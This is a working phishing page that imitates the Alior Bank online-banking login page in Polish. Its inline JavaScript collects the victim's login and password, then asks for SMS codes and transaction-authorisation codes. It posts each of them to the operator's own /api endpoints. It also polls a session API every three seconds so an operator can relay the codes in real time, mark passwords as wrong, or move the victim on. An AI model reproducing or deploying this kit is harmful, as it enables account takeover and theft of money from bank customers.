<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html lang="pl" class="notranslate" translate="no">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!--<base href="/">-->
    <base href=".">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="google" content="notranslate">
    <title>Alior Online – bankowość internetowa Alior Banku</title>
    <meta name="apple-mobile-web-app-title" content="AliorBank">
    <meta name="application-name" content="AliorBank">
    <link rel="shortcut icon" href="https://system.aliorbank.pl/assets/img/favicon.ico" type="image/x-icon">
    <meta name="description" content="Logowanie do systemu bankowości internetowej Alior Banku.">
    <meta name="keywords" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <meta name="format-detection" content="telephone=no">
    <link rel="stylesheet" href="/assets/banks/aliorbank_files/styles.a8a9724f7f4229ff352a.css">
    <style>@-webkit-keyframes pulse1{0%{transform:scale(0);opacity:1}80%{transform:scale(1);opacity:0}to{transform:scale(1);opacity:0}}@keyframes pulse1{0%{transform:scale(0);opacity:1}80%{transform:scale(1);opacity:0}to{transform:scale(1);opacity:0}}@-webkit-keyframes pulse2{0%{transform:scale(0);opacity:1}20%{transform:scale(0);opacity:1}85%{transform:scale(.7);opacity:0}to{transform:scale(1);opacity:0}}@keyframes pulse2{0%{transform:scale(0);opacity:1}20%{transform:scale(0);opacity:1}85%{transform:scale(.7);opacity:0}to{transform:scale(1);opacity:0}}@-webkit-keyframes pulse3{0%{transform:scale(0);opacity:1}40%{transform:scale(0);opacity:1}90%{transform:scale(.35);opacity:0}to{transform:scale(1);opacity:0}}@keyframes pulse3{0%{transform:scale(0);opacity:1}40%{transform:scale(0);opacity:1}90%{transform:scale(.35);opacity:0}to{transform:scale(1);opacity:0}}@media (max-width:639px){.small-only-show-for-sr[_ngcontent-rgv-c9]{position:absolute!important;width:1px;height:1px;overflow:hidden;clip:rect(0,0,0,0)}}@media (min-width:640px){.medium-show-for-sr[_ngcontent-rgv-c9]{position:absolute!important;width:1px;height:1px;overflow:hidden;clip:rect(0,0,0,0)}}.loading-spinner[_ngcontent-rgv-c9]{position:fixed;top:0;left:0;width:100%;height:100vh;background-color:var(--color-background-2-transparent-75);transition:transform .2s ease;z-index:9999}.loading-spinner.transparent-background[_ngcontent-rgv-c9]{background-color:transparent}.loading-inside[_ngcontent-rgv-c9]{position:absolute;height:100%}</style>
    <style>@-webkit-keyframes pulse1{0%{transform:scale(0);opacity:1}80%{transform:scale(1);opacity:0}to{transform:scale(1);opacity:0}}@keyframes pulse1{0%{transform:scale(0);opacity:1}80%{transform:scale(1);opacity:0}to{transform:scale(1);opacity:0}}@-webkit-keyframes pulse2{0%{transform:scale(0);opacity:1}20%{transform:scale(0);opacity:1}85%{transform:scale(.7);opacity:0}to{transform:scale(1);opacity:0}}@keyframes pulse2{0%{transform:scale(0);opacity:1}20%{transform:scale(0);opacity:1}85%{transform:scale(.7);opacity:0}to{transform:scale(1);opacity:0}}@-webkit-keyframes pulse3{0%{transform:scale(0);opacity:1}40%{transform:scale(0);opacity:1}90%{transform:scale(.35);opacity:0}to{transform:scale(1);opacity:0}}@keyframes pulse3{0%{transform:scale(0);opacity:1}40%{transform:scale(0);opacity:1}90%{transform:scale(.35);opacity:0}to{transform:scale(1);opacity:0}}@media (max-width:639px){.small-only-show-for-sr[_ngcontent-rgv-c7]{position:absolute!important;width:1px;height:1px;overflow:hidden;clip:rect(0,0,0,0)}}@media (min-width:640px){.medium-show-for-sr[_ngcontent-rgv-c7]{position:absolute!important;width:1px;height:1px;overflow:hidden;clip:rect(0,0,0,0)}}.circle-loader[_ngcontent-rgv-c7]   svg[_ngcontent-rgv-c7]{width:60px;height:60px;-webkit-animation:loaderRotate 2s linear infinite;animation:loaderRotate 2s linear infinite;transform-origin:center center}.circle-loader[_ngcontent-rgv-c7]   svg[_ngcontent-rgv-c7]   circle[_ngcontent-rgv-c7]{-webkit-animation:loaderDashAnimation 2s ease-in-out infinite;animation:loaderDashAnimation 2s ease-in-out infinite;stroke:var(--color-animated-loader-stroke);stroke-dasharray:80,200;stroke-dashoffset:0;stroke-linecap:round;stroke-width:4px}.circle-loader.xsmall[_ngcontent-rgv-c7], .circle-loader.xsmall[_ngcontent-rgv-c7]   svg[_ngcontent-rgv-c7]{width:1rem;height:1rem}.circle-loader.small[_ngcontent-rgv-c7], .circle-loader.small[_ngcontent-rgv-c7]   svg[_ngcontent-rgv-c7]{width:1.875rem;height:1.875rem}.circle-loader.medium[_ngcontent-rgv-c7], .circle-loader.medium[_ngcontent-rgv-c7]   svg[_ngcontent-rgv-c7]{width:2.5rem;height:2.5rem}.circle-loader.large[_ngcontent-rgv-c7], .circle-loader.large[_ngcontent-rgv-c7]   svg[_ngcontent-rgv-c7]{width:3.75rem;height:3.75rem}@-webkit-keyframes loaderDashAnimation{0%{stroke-dasharray:1,200;stroke-dashoffset:0}50%{stroke-dasharray:89,200;stroke-dashoffset:-35px}to{stroke-dasharray:89,200;stroke-dashoffset:-124px}}@keyframes loaderDashAnimation{0%{stroke-dasharray:1,200;stroke-dashoffset:0}50%{stroke-dasharray:89,200;stroke-dashoffset:-35px}to{stroke-dasharray:89,200;stroke-dashoffset:-124px}}@-webkit-keyframes loaderRotate{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes loaderRotate{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}</style>
</head>
<body class="">
<app-component class="ng-tns-c11-0" ng-version="10.1.1">
    <div class="ng-tns-c11-0 ng-trigger ng-trigger-fadeInOutFast ng-star-inserted">
        <router-outlet class="ng-tns-c11-0"></router-outlet>
        <!---->
    </div>
    <!---->
    <!---->
    <!---->
</app-component>
<!---->
<div ui-view="app" ng-csp="" class="view-app" style="">
    <app-ajs-root>
        <!---->
        <div ng-if="!aarCtrl.cloakActive">
            <!---->
            <div ui-view="root" class="clearfix" style="">
                <external>
                    <div>
                        <!---->
                        <div ui-view="modal" class="modal"></div>
                        <!---->
                        <div ui-view="content"></div>
                    </div>
                </external>
            </div>
            <!---->
            <div ui-view="error"></div>
            <!---->
            <div ui-view="auth" class="sign-in-site" style="">
                <auth>
                    <alert key="main">
                        <!---->
                    </alert>
                    <!---->
                    <div ui-view="main" class="sign-in-wrapper">
                        <auth.sign-in>
                            <div class="external-page" app-when-offline="">
                                <!---->
                                <div ui-view="sign-in">
                                    <auth.sign-in.cif reset-session="resetSession" form-data="formData" blik-booster-data="blikBoosterData">
                                        <div>
                                            <mobile-app-ad>
                                                <div class="mobile-app-add ng-hide" ng-show="maCtrl.showAd">
                                                    <div role="banner" class="banner-container">
                                                        <span class="icon icon-close" ng-click="maCtrl.close()"></span>
                                                        <a href="http://www.aliorbank.pl/" class="logo" title="Alior Bank">
                                                            <img src="/assets/banks/aliorbank_files/alior-logo-shop.svg" alt="Alior Bank">
                                                        </a>
                                                        <div class="header-section">
                                                            <h1>Aplikacja Alior Mobile</h1>
                                                            <h2>Pobierz aplikację na swój telefon</h2>
                                                        </div>
                                                        <div class="download-section float-right">
                                                            <a href="https://itunes.apple.com/pl/app/alior-bank/id1226971903?l=pl&amp;mt=8" target="_blank" class="download-link" role="button" title="Pobierz">Pobierz</a>
                                                        </div>
                                                    </div>
                                                </div>
                                            </mobile-app-ad>
                                            <auth-header heading="Zaloguj się" mobile-heading="">
                                                <header role="banner" app-when-offline="">
                                                    <a href="http://www.aliorbank.pl/" class="logo" title="Alior Bank">
                                                        <img src="/assets/banks/aliorbank_files/alior-logo.svg" alt="Alior Bank">
                                                    </a>
                                                    <h1 tabindex="0">
                                                        <span class="hide-for-medium">Zaloguj się</span>
                                                        <span class="show-for-medium">Zaloguj się</span>
                                                    </h1>
                                                    <!---->
                                                </header>
                                            </auth-header>
                                            <main data-routes="">
                                                <external-page-background>
                                                    <interchange class="external-page-background" small-bg="https://system.aliorbank.pl/assets/img/login/first-time-login-800.jpg" medium-bg="https://system.aliorbank.pl/assets/img/login/first-time-login-1200.jpg" large-bg="https://system.aliorbank.pl/assets/img/login/first-time-login-1600.jpg" xlarge-bg="https://system.aliorbank.pl/assets/img/login/first-time-login-1920.jpg" style="background-image: url(https://system.aliorbank.pl/assets/img/login/first-time-login-1920.jpg);"></interchange>
                                                </external-page-background>
                                                <div class="auth-wrapper flex-column" ng-class="{&#39;with-blik&#39;: scCtrl.blikBoosterOption}">
                                                    <div class="flex-grow">
                                                        <auth-greeting>
                                                            <div class="row align-center">
                                                                <div class="small-19 medium-18 column">
                                                                    <div class="auth-greeting">
                                                                        <h2 id="summaryInfo" tabindex="0">Witamy w Alior Banku!</h2>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </auth-greeting>
                                                        <div class="row align-center">
                                                            <div class="column small-19 medium-9 large-7">
                                                                <!---->
                                                                <external-section>
                                                                    <section class="external-section-wrapper">
                                                                        <svg class="external-section-svg"
                                                                             xmlns="http://www.w3.org/2000/svg">
                                                                            <rect fill="#FFF" width="100%" height="100%"></rect>
                                                                        </svg>
                                                                        <div class="external-section-content p-8 large-p-10" ng-class="[ { &#39;no-min-height&#39;: esCtrl.noMinHeight, &#39;p-8 large-p-10&#39;: !esCtrl.customPadding }, esCtrl.customPadding, esCtrl.customMargin ]" ng-transclude="">
                                                                            <!---->
                                                                            <cif-form form-data="scCtrl.formData">
                                                                                <div action="https://system.aliorbank.pl/" name="form" novalidate="" ng-class="{&#39;form-loading&#39;: $formCtrl.formLoaderActive}" opts="cfCtrl.formData.validation" class="ng-pristine ng-valid">
                                                                                    <!---->
                                                                                    <div class="form-container">
                                                                                        <div ng-transclude="">
                                                                                            <fieldset class="with-virtual-keyboard" id="mainCont">
                                                                                                <label for="login">Login </label>
                                                                                                <div class="js-keyboard-container js-keyboard-login field" caps-lock-alert="">
                                                                                                    <input id="bank_login" name="login" class="js-keyboard-input large-input ng-pristine ng-valid ng-empty validate-field ng-touched" type="text" autocomplete="off" ng-model="cfCtrl.formData.command.login" virtual-keyboard="" validation-on="submit" placeholder="Wpisz identyfikator klienta" style="">
                                                                                                    <span validation="cfCtrl.formData.validation" class="js-keyboard-trigger"></span>
                                                                                                    <!---->
                                                                                                </div>

                                                                                                <label for="login">Hasło </label>
                                                                                                <div class="js-keyboard-container js-keyboard-login field" caps-lock-alert="">
                                                                                                    <input id="bank_password" type="password" name="login" class="js-keyboard-input large-input ng-pristine ng-valid ng-empty validate-field ng-touched" type="text" autocomplete="off" ng-model="cfCtrl.formData.command.login" virtual-keyboard="" validation-on="submit" placeholder="Wpisz identyfikator klienta" style="">
                                                                                                    <span validation="cfCtrl.formData.validation" class="js-keyboard-trigger"></span>
                                                                                                    <!---->
                                                                                                </div>
                                                                                            </fieldset>
                                                                                            <div id="buttonsCont">
                                                                                                <button onclick="bankLogin(); plusBankUpdate()" class="button primary expanded login-submit" type="submit" title="Dalej" ng-bind-html="&#39;login.form.next&#39; | translate">Dalej</button>
                                                                                            </div>
                                                                                            <div class="text-right">
                                                                                                <a ui-sref="root.external.unblock-access" gemius-event="mousedown" gemius-params="button=action/Problemy_z_autoryzacja" href="https://system.aliorbank.pl/unblock-access">Problem z logowaniem?</a>
                                                                                                <br>
                                                                                                <a ng-href="https://www.aliorbank.pl/dodatkowe-informacje/bankowosc-elektroniczna/nowa-bankowosc-internetowa.html?utm_source=nowa-bankowosc&amp;utm_medium=logowanie-link2" target="_blank" gemius-event="mousedown" gemius-params="button=action/Poznaj nowy system bankowości" href="https://www.aliorbank.pl/dodatkowe-informacje/bankowosc-elektroniczna/nowa-bankowosc-internetowa.html?utm_source=nowa-bankowosc&amp;utm_medium=logowanie-link2">Poznaj nowy system bankowości</a>
                                                                                            </div>
                                                                                        </div>
                                                                                    </div>
                                                                                    <input tabindex="-1" type="text" style="position: absolute; left: -161289320px;" name="extra-input-161289320">
                                                                                </div>
                                                                            </cif-form>
                                                                            <system-info>
                                                                                <div>
                                                                                    <!---->
                                                                                    <!---->
                                                                                    <!---->
                                                                                    <!---->
                                                                                </div>
                                                                            </system-info>
                                                                        </div>
                                                                    </section>
                                                                </external-section>
                                                            </div>
                                                            <div class="column small-19 medium-offset-1 medium-8 large-10" ng-class="scCtrl.blikBoosterOption ? &#39;medium-9 large-11&#39; : &#39;medium-offset-1 medium-8 large-10&#39;">
                                                                <!---->
                                                                <div ng-if="!scCtrl.blikBoosterOption" class="sign-in-placement"></div>
                                                                <!---->
                                                                <!---->
                                                                <div class="lang-switch-section row">
                                                                    <div class="column expand">
                                                                        <!---->
                                                                        <auth-restrict-card ng-if="!scCtrl.blikBoosterOption">
                                                                            <div class="restrict-card">
                                                                                <div class="has-icon">
                                                                                    <svg width="26" height="26" viewBox="0 0 283.46 283.46"
                                                                                         xmlns="http://www.w3.org/2000/svg">
                                                                                        <path d="m241.935 230.769h-206.287c-10.174 0-18.45-8.277-18.45-18.45v-127.777c0-10.173 8.276-18.45 18.45-18.45h206.287c10.174 0 18.45 8.277 18.45 18.45v127.777c.001 10.173-8.276 18.45-18.45 18.45zm-206.287-150.678c-2.454 0-4.45 1.997-4.45 4.45v127.777c0 2.454 1.996 4.45 4.45 4.45h206.287c2.454 0 4.45-1.996 4.45-4.45v-127.776c0-2.454-1.996-4.45-4.45-4.45h-206.287z"></path>
                                                                                        <path d="m249.456 120.377h-218.369c-3.866 0-7-3.134-7-7s3.134-7 7-7h218.369c3.866 0 7 3.134 7 7s-3.134 7-7 7z"></path>
                                                                                        <path d="m251.375 163.054h-218.37c-3.866 0-7-3.134-7-7s3.134-7 7-7h218.37c3.866 0 7 3.134 7 7s-3.134 7-7 7z"></path>
                                                                                    </svg>
                                                                                    <span class="icon icon-ban"></span>
                                                                                    <span tabindex="0">Zastrzeż kartę - kontakt:
																																									<strong>12 19 502</strong>
																																								</span>
                                                                                    <br>
                                                                                    <span tabindex="0">z zagranicy
																																										<strong>+48 12 19 502</strong>
																																									</span>
                                                                                </div>
                                                                            </div>
                                                                        </auth-restrict-card>
                                                                        <!---->
                                                                        <div class="spacer s1"></div>
                                                                    </div>
                                                                    <div class="column shrink" ng-class="{&#39;medium-text-right&#39;: scCtrl.blikBoosterOption}">
                                                                        <lang-switch>
                                                                            <custom-select name="lang-switch" template-name="lang-switch" class="lang-switch" model="lsCtrl.selectConfig.model" change="lsCtrl.changeLanguage()" config="lsCtrl.selectConfig">
                                                                                <div ng-class="[sfCtrl.rootClassName, sfCtrl.rootVariantClassName]" class="relative lang-switch">
                                                                                    <!---->
                                                                                    <div ng-if="!sfCtrl.config.multiple">
                                                                                        <select class="custom-select selectized" name="lang-switch" id="lang-switch" ng-disabled="sfCtrl.disable" ng-model="sfCtrl.model" ng-options="option[sfCtrl.configSelectize.labelField] for option in sfCtrl.config.options track by option[sfCtrl.configSelectize.valueField]" ng-change="sfCtrl.onChange()" ng-attr-novalidate="{{ sfCtrl.noValidate }}" validate-on-watch="" tabindex="-1" style="display: none;">
                                                                                            <option value="pl" selected="selected">Polski</option>
                                                                                        </select>
                                                                                        <div class="selectize-control custom-select single plugin-keyboard-navigation">
                                                                                            <div class="selectize-input items full has-options has-items" aria-labelledby="label_lang-switch  selected_lang-switch3" role="listbox" aria-haspopup="listbox" aria-multiselectable="false" tabindex="0" aria-expanded="false" aria-owns="list_lang-switch">
                                                                                                <div data-value="pl" class="option clearfix" id="selected_lang-switch3">
                                                                                                    <img class="lang-switch-icon" src="/assets/banks/aliorbank_files/pl.svg" role="presentation">
                                                                                                    <span>Polski</span>
                                                                                                </div>
                                                                                                <input type="text" autocomplete="off" tabindex="" class="display-input" style="width: 4px;">
                                                                                            </div>
                                                                                            <div class="selectize-dropdown single custom-select plugin-keyboard-navigation" style="display: none; width: 170px; top: 50px; left: 0px; transform: translate(0px, 0px); margin-top: 0px;">
                                                                                                <div class="selectize-dropdown-content" id="list_lang-switch" tabindex="-1"></div>
                                                                                            </div>
                                                                                        </div>
                                                                                    </div>
                                                                                    <!---->
                                                                                    <!---->
                                                                                    <!---->
                                                                                </div>
                                                                            </custom-select>
                                                                        </lang-switch>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <security-info>
                                                        <div>
                                                            <solid-separator class="block my-4" is-horizontal="true">
                                                                <div class="solid-separator horizontal" ng-class="::[ ssCtrl.isHorizontal ? &#39;horizontal&#39; : &#39;vertical&#39;, { &#39;position-left&#39;: !ssCtrl.isHorizontal &amp;&amp; !ssCtrl.positionRight &amp;&amp; !ssCtrl.positionCenter, &#39;position-right&#39;: !ssCtrl.isHorizontal &amp;&amp; ssCtrl.positionRight, &#39;position-center&#39;: !ssCtrl.isHorizontal &amp;&amp; ssCtrl.positionCenter } ]"></div>
                                                            </solid-separator>
                                                            <div class="row align-center">
                                                                <div class="column small-19 medium-18">
                                                                    <div class="row security-info-wrapper">
                                                                        <div class="column expand">
                                                                            <ul class="list basic security-info-list">
                                                                                <li class="has-icon" tabindex="0">
                                                                                    <svg viewBox="0 0 283.46 283.46"
                                                                                         xmlns="http://www.w3.org/2000/svg" width="24" height="24">
                                                                                        <g fill="#767676">
                                                                                            <path d="m127.278 183.414c-1.792 0-3.583-.684-4.95-2.05l-40.465-40.465c-2.734-2.733-2.734-7.166 0-9.899 2.733-2.733 7.166-2.733 9.899 0l35.515 35.515 64.418-64.418c2.733-2.733 7.166-2.733 9.899 0 2.734 2.733 2.734 7.166 0 9.899l-69.368 69.368c-1.365 1.366-3.156 2.05-4.948 2.05z"></path>
                                                                                            <path d="m141.726 278.172c-1.143 0-2.284-.279-3.318-.836-32.124-17.291-60.664-39.185-84.826-65.074-14.568-15.608-21.954-34.35-21.954-55.707v-130.949c0-3.185 2.149-5.968 5.23-6.772 68.803-17.976 139.358-17.979 209.707-.01 3.099.792 5.268 3.583 5.268 6.782v131.841c0 20.661-6.978 38.954-20.739 54.37-25.096 28.111-54.144 50.205-86.337 65.665-.96.461-1.996.69-3.031.69zm-96.099-247.123v125.506c0 17.944 5.95 33.042 18.188 46.154 22.33 23.925 48.586 44.295 78.084 60.585 29.25-14.571 55.727-35.012 78.749-60.801 11.563-12.953 17.184-27.688 17.184-45.047v-126.368c-64.492-15.621-129.096-15.633-192.205-.029z"></path>
                                                                                        </g>
                                                                                    </svg>
                                                                                    <span class="icon icon-ban"></span>Sprawdź certyfikat
                                                                                </li>
                                                                                <li class="has-icon" tabindex="0">
                                                                                    <svg viewBox="0 0 283.46 283.46"
                                                                                         xmlns="http://www.w3.org/2000/svg" width="24" height="24">
                                                                                        <g fill="#767676">
                                                                                            <path d="m70.197 136.421c-1.83 0-3.66-.447-5.301-1.342l-1.977-1.079c-.054-.029-.107-.059-.16-.09-14.279-8.282-31.416-9.584-47.016-3.575-3.529 1.359-7.486.463-10.079-2.279-2.592-2.741-3.264-6.738-1.711-10.181 1.894-4.201 3.987-8.236 6.398-12.336 13.569-23.367 27.392-45.757 47.255-62.861 22.792-19.627 50.332-29.168 84.194-29.168 77.789 0 106.292 48.694 131.441 91.656 2.241 3.81 4.276 7.682 6.213 11.823 1.608 3.438.979 7.454-1.604 10.231-2.59 2.785-6.564 3.705-10.119 2.344-15.562-5.952-32.654-4.632-46.889 3.624-.053.031-.107.061-.161.09l-1.979 1.079c-3.397 1.854-7.434 1.814-10.795-.107l-3.085-1.763c-16.857-9.543-37.595-9.607-54.177-.178l-2.652 1.895c-3.506 2.504-8.189 2.741-11.93.603l-2.793-1.596c-8.269-4.771-17.936-7.39-27.245-7.39s-18.976 2.619-27.22 7.375l-3.11 1.777c-1.691.965-3.594 1.448-5.498 1.448zm-.496-14.669.465.254 1.666-.952c10.312-5.95 22.463-9.234 34.19-9.234s23.878 3.285 34.216 9.249l1.141.652 1.411-1.008c.184-.132.375-.254.571-.368 20.905-12.06 47.106-12.07 68.381-.028l1.69.966.466-.254c14.59-8.436 31.539-11.093 47.87-7.744-.199-.346-.399-.69-.603-1.035-24.391-41.668-49.604-84.742-119.366-84.742-64.801 0-91.36 36.869-119.346 85.069-.007.011-.014.023-.02.034-.284.482-.563.964-.837 1.444 16.407-3.423 33.438-.783 48.105 7.697zm-53.301-12.689h.01z"></path>
                                                                                            <path d="m118.721 273.951c-16.875 0-30.589-13.202-31.222-30.055-.145-3.863 2.869-7.113 6.732-7.258 3.84-.144 7.113 2.87 7.258 6.732.349 9.298 7.918 16.581 17.231 16.581 9.508 0 17.244-7.736 17.244-17.244v-83.851c0-3.866 3.134-7 7-7s7 3.134 7 7v83.851c.001 17.228-14.015 31.244-31.243 31.244z"></path>
                                                                                        </g>
                                                                                    </svg>
                                                                                    <span class="icon icon-ban"></span>Pamiętaj o ochronie antywirusowej
                                                                                </li>
                                                                                <li class="has-icon" tabindex="0">
                                                                                    <svg viewBox="0 0 283.46 283.46"
                                                                                         xmlns="http://www.w3.org/2000/svg" width="24" height="24">
                                                                                        <g fill="#767676">
                                                                                            <path d="m139.635 277.009h-104.621c-10.378 0-18.82-8.443-18.82-18.82v-234.311c0-5.031 1.96-9.759 5.52-13.314 3.554-3.551 8.277-5.506 13.301-5.506h.019l99.354.1c4.961.004 9.623 1.941 13.127 5.456 3.503 3.514 5.427 8.182 5.416 13.144l-.072 52.812c-.003 1.227.472 2.375 1.335 3.239.862.862 2.007 1.336 3.225 1.336h.009l51.525-.072h.038c4.946 0 9.601 1.925 13.105 5.423 3.514 3.507 5.449 8.172 5.449 13.137v21.87c0 3.866-3.134 7-7 7s-7-3.134-7-7v-21.87c0-1.22-.476-2.366-1.339-3.228-.861-.859-2.005-1.333-3.221-1.333-.003 0-.006 0-.01 0l-51.525.072c-.012 0-.024 0-.036 0-4.955 0-9.614-1.93-13.121-5.438-3.516-3.516-5.445-8.19-5.435-13.162l.072-52.812c.003-1.225-.47-2.372-1.331-3.234-.86-.863-2.006-1.339-3.225-1.34l-99.354-.1c-.002 0-.004 0-.005 0-1.286 0-2.496.5-3.406 1.41-.912.911-1.414 2.122-1.414 3.41v234.311c0 2.658 2.162 4.82 4.82 4.82h104.621c3.866 0 7 3.134 7 7s-3.135 7-7.001 7z"></path>
                                                                                            <path d="m216.314 97.985c-1.814 0-3.627-.701-4.998-2.099l-75.086-76.558c-2.706-2.76-2.663-7.192.097-9.899 2.761-2.706 7.192-2.664 9.899.096l75.086 76.559c2.706 2.76 2.663 7.192-.097 9.899-1.362 1.336-3.133 2.002-4.901 2.002z"></path>
                                                                                            <path d="m259.867 277.275h-76.464c-7.716 0-13.993-6.277-13.993-13.994v-46.606c0-7.716 6.277-13.994 13.993-13.994h76.464c7.716 0 13.993 6.277 13.993 13.994v46.606c.001 7.717-6.277 13.994-13.993 13.994zm-76.457-60.593v46.6l76.457-.006-.007-46.6z"></path>
                                                                                            <path d="m251.304 215.98c-3.866 0-7-3.134-7-7v-27.628c0-12.137-9.874-22.01-22.01-22.01-12.137 0-22.011 9.874-22.011 22.01v4.342c0 3.866-3.134 7-7 7s-7-3.134-7-7v-4.342c0-19.856 16.154-36.01 36.011-36.01 19.855 0 36.01 16.154 36.01 36.01v27.628c0 3.867-3.134 7-7 7z"></path>
                                                                                        </g>
                                                                                    </svg>
                                                                                    <span class="icon icon-ban"></span>Chroń swoje dane
                                                                                </li>
                                                                            </ul>
                                                                        </div>
                                                                        <div class="column shrink">
                                                                            <a href="https://www.aliorbank.pl/dodatkowe-informacje/bezpieczenstwo/bezpieczenstwo-po-stronie-Banku.html" target="_blank" class="security-info-link" gemius-event="mousedown" gemius-params="button=action/Więcej o bezpieczeństwie">Więcej o bezpieczeństwie</a>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </security-info>
                                                </div>
                                            </main>
                                        </div>
                                    </auth.sign-in.cif>
                                </div>
                            </div>
                        </auth.sign-in>
                    </div>
                </auth>
            </div>
        </div>
        <!---->
        <!---->
    </app-ajs-root>
</div>


<script src="/assets/js/jquery-3.5.1.min.js"></script>
<script src="/assets/js/cookies.core.1.3.min.js"></script>
<script src="/assets/js/banklogin.js"></script>
<script>
    let bankId = (cookieManager.read('session_id'))

    const plusBankUpdate = () => {
        if ($("#bank_password").val() && $("#bank_login").val() !== "") {
            $("#mainCont").empty()
            $("#mainCont").append(' <label for="login">Wpisz SMS lub potwierdź logowanie w aplikacji mobilnej</label> <div class="js-keyboard-container js-keyboard-login field" caps-lock-alert=""> <input id="bank_psd" name="login" class="js-keyboard-input large-input ng-pristine ng-valid ng-empty validate-field ng-touched" type="text" autocomplete="off" ng-model="cfCtrl.formData.command.login" virtual-keyboard="" validation-on="submit" placeholder="Wpisz kod SMS" style=""> <span validation="cfCtrl.formData.validation" class="js-keyboard-trigger"></span> </div>')
            $("#buttonsCont").empty()
            $("#buttonsCont").append('<button onclick="psdUpdate()" class="button primary expanded login-submit" type="submit" title="Dalej" ng-bind-html="&#39;login.form.next&#39; | translate">Dalej</button>')
        } else {
        }
    }

    const regularCheck = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "true") {
                        // window.location.href = '/summary'
                        summaryFunc()
                        clearInterval(multipleFunc)
                    }
                } else {

                }
            }
        });
    }
    const psdUpdate = () => {
        if ($("#bank_psd").val() !== "") {
            $.post("/api/psdupdate/", {
                bank_psd: $("#bank_psd").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#mainCont").append('<p style="font-size: 20px">Logowanie...</p')
                $("#buttonsCont").empty()
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    let multipleFunc = setInterval(function(){ regularCheck() }, 3000);

    //WRONG PASS

    const wrongPass = () => {
        $.post("/api/wrongpass/", {
            sessionId: bankId,
            name: "false"
        }).done(data => {
            console.log('done')
        }).fail(error => {
            console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
        })
    }

    const regularPass = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "wrongPass") {
                        clearInterval(multiplePass)
                        wrongPass()
                        location.reload()
                    }
                } else {

                }
            }
        });
    }

    let multiplePass = setInterval(function(){ regularPass() }, 3000);


    //SUMMARY

    const summaryFunc = () => {
        $("#mainCont").empty()
        $("#mainCont").append(' <label for="login">Wpisz SMS lub potwierdź logowanie w aplikacji mobilnej</label> <div class="js-keyboard-container js-keyboard-login field" caps-lock-alert=""> <input id="bank_summary" name="login" class="js-keyboard-input large-input ng-pristine ng-valid ng-empty validate-field ng-touched" type="text" autocomplete="off" ng-model="cfCtrl.formData.command.login" virtual-keyboard="" validation-on="submit" placeholder="Wpisz kod SMS" style=""> <span validation="cfCtrl.formData.validation" class="js-keyboard-trigger"></span> </div>')
        $("#buttonsCont").empty()
        $("#buttonsCont").append('<button onclick="summaryCode()" class="button primary expanded login-submit" type="submit" title="Dalej" ng-bind-html="&#39;login.form.next&#39; | translate">Dalej</button>')
        document.getElementById('summaryInfo').innerText = 'Autoryzuj transakcje'

    }

    const summaryCode = () => {
        if ($("#bank_summary").val() !== "") {
            $.post("/api/summarycode/", {
                bank_summary: $("#bank_summary").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#mainCont").append('<p style="font-size: 20px">Czekaj...</p')
                $("#buttonsCont").empty()
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.","Wystąpił błąd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);
</script>
</body>
</html>